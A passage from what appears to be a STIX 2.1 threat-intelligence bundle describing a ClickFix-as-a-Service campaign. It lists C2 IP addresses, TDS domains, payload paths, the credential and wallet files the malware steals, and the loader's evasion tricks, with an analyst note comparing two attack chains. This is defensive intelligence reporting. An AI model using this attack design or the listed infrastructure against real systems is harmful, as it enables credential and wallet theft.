      "description": "Bryan campaign \u2014 a distinct affiliate instance of the SL-ADV-007 TDS cluster. Uses sdntds.shop/teamrepo TDS endpoint (V2 infrastructure). Loader variant adds userAgent fingerprinting, URL filter (.php/.txt/sitemap/robots), and dual cache-buster (Math.random() + Date.now()). PS chain uses dedicated IPs: 91.92.240.117 (stage1), 91.92.240.121 (stage2). DonutLoader fetches 'student' payload set: student_s.bin + student_l.bin. DLL name randomized: dwqlmpkj.dll. Linked to bryanexhaust.com domain. Confirms affiliate-market hypothesis: separate C2s, separate payload segment, separate DLL name, same shared TDS/DonutLoader backend infrastructure.",
      "first_seen": "2026-05-01T00:00:00Z",
      "last_seen": "2026-05-19T00:00:00.000Z",
      "labels": [
        "clickfix",
        "tds",
        "bryan",
        "affiliate",
        "student-segment",
        "sdntds"
      ]
    },
    {
      "type": "note",
      "spec_version": "2.1",
      "id": "note--f8d4b7b5-6316-4b5b-8b52-0e887b1ff176",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "abstract": "Comparison of two callchains \u2014 V1 original vs Bryan affiliate campaign",
      "content": "Two distinct Windows-stage attack chains documented, sharing backend infrastructure:\n\nORIGINAL CHAIN (V1 / SL-ADV-007):\n  TDS: ntdnewtds.shop/jsrepo or dnsnewtds.shop/jsrepo\n  PS Stage1: 178.16.52.232\n  PS Stage2: 158.94.208.92\n  DLL: tr0oowwq.dll (TR/Rozena.Gen)\n  DonutLoader C2: 158.94.208.104:80 (generic payload path)\n  Credential targets: Chrome History/Cookies, Firefox key4.db, Electrum, Jaxx\n  Parallel chain: payload.js \u2192 WScript \u2192 rundll32 \u2192 PS \u2192 filemail \u2192 Protected.py \u2192 wab.exe\n  Cache-buster: Math.random() only\n  URL filter: none\n  UA fingerprint: none\n\nBRYAN CHAIN (bryanexhaust.com affiliate):\n  TDS: sdntds.shop/teamrepo (V2 endpoint)\n  PS Stage1: 91.92.240.117 (dedicated affiliate C2)\n  PS Stage2: 91.92.240.121 (dedicated affiliate C2)\n  DLL: dwqlmpkj.dll (same function, randomized name)\n  DonutLoader: student_s.bin + student_l.bin from 158.94.208.104/x7GkP2mQ9zL4/\n  Credential targets: Chrome cookies/history, Firefox places.sqlite\n  No parallel Python chain\n  Cache-buster: Math.random() + Date.now() (stronger)\n  URL filter: /\\.php|\\.txt|sitemap.*\\.xml|robots\\.txt/i (bot avoidance)\n  UA fingerprint: navigator.userAgent read before XHR\n\nSHARED INFRASTRUCTURE:\n  DonutLoader C2: 158.94.208.104 (same host, different payload paths)\n  Same RC4+Base64 obfuscation cipher\n  Same window.__performance_optimizer_v6 guard\n  Same createElement/script.text/head.appendChild injection sink\n\nINTERPRETATION:\n  The Bryan chain is an affiliate instance. Dedicated C2 IPs (91.92.240.117/121) and 'student' payload segment on shared DonutLoader infrastructure confirm per-affiliate resource allocation within a ClickFix-as-a-Service platform. The loader hardening (UA fingerprint, URL filter, dual cache-buster) may reflect affiliate-specific configuration or a later platform version.",
      "object_refs": [
        "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9",
        "campaign--6602261d-b993-479b-9fc1-d15e082d751a"
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--437f40ff-29c1-4027-bed3-6e3c7cee05c5",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9",
      "description": "Bryan affiliate campaign PS dropper"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ccfa633e-33e4-4fb7-b749-2d5fc9afc050",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "campaign--6602261d-b993-479b-9fc1-d15e082d751a"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--610fa698-f978-4f0c-a327-adc1ca4b14a5",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "attributed-to",
      "source_ref": "campaign--6602261d-b993-479b-9fc1-d15e082d751a",
      "target_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7bb15a7f-6147-4b51-bcfc-193c32a546b3",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9",
      "target_ref": "infrastructure--937bb209-fd7c-481a-9c76-736cf14c8813",
      "description": "PS Stage1 C2"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2d04a952-0f9a-4581-abd6-763d9e633fa2",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9",
      "target_ref": "infrastructure--a8742037-1ec8-433c-a173-1666c3e92b71",
      "description": "PS Stage2 C2"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--79c8f6d4-21f9-41d1-96a5-e4f739861d1a",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9",
      "target_ref": "infrastructure--806df9e8-09bf-448a-9bb0-7f3adf608a11",
      "description": "DonutLoader C2"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6bc3b3a1-1d52-44e1-afe4-4afbc4a41b91",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "drops",
      "source_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9",
      "target_ref": "malware--2dcc8a11-30b5-446f-974e-1fa323235f77",
      "description": "Compiles dwqlmpkj.dll (Rozena variant)"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0c1ff019-dec2-4fa7-b8bc-d53978542fcc",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9",
      "target_ref": "process--ff773823-abbd-4b42-b33f-0302f37dae1f",
      "description": "Stage1 PS process"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cc3a0f2b-62b1-4bfd-8a9c-1a3c2439683e",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9",
      "target_ref": "process--b12d60ee-5fa0-4c08-adb8-09585ed2ee5e",
      "description": "csc.exe DLL compilation"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--38a4977c-481b-4e31-b51b-fdbfdaf72224",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9",
      "target_ref": "process--fa818c68-3da4-4053-8cfd-4fb88482a0c8",
      "description": "svchost.exe injection target"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--40c3004e-6ed1-42d1-9a74-2925771ce65a",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "related-to",
      "source_ref": "observed-data--1e400f18-0cd6-4cf0-a76f-05f936a642c3",
      "target_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c4525ff5-aa67-4c50-9a1d-b2899c06f0c4",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "related-to",
      "source_ref": "observed-data--d255af9b-affa-4662-9628-876708c3b978",
      "target_ref": "malware--2dcc8a11-30b5-446f-974e-1fa323235f77"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9be5d4fc-9574-4737-a195-628e736bc870",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "related-to",
      "source_ref": "observed-data--69ee0923-f4ca-4b22-8663-6e53c9b15216",
      "target_ref": "malware--6d0e0b80-3486-4c90-bc0b-907b99bcddd7"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fe8592fd-a702-4ad8-a87a-756b6fceadb2",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--4ad3bb0b-98e6-4b68-8940-60b50e15d410",
      "target_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7e722dd5-b88e-432c-b7ab-d7037dc3f55f",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--7f56fc75-17b4-463c-8d51-6cea59fb9c67",
      "target_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--41c4adf9-aff1-489e-90a5-2f517c316950",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--17945ceb-5351-4271-b5fb-0dc1262db963",
      "target_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8dce1b40-6676-48cc-99f8-4959ff9594f1",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--ebb46384-b61d-4ae1-8e2a-aafa6ff724b4",
      "target_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d4643f00-874b-4620-99a6-822f673397fd",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--0c18e504-9a50-4da5-8acc-e954c9224b94",
      "target_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7c7a8a18-1adf-4833-88f1-c569a8c56a17",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--fce050a1-6f2e-4d5a-9168-a77515118121",
      "target_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9"
    }
  ]
}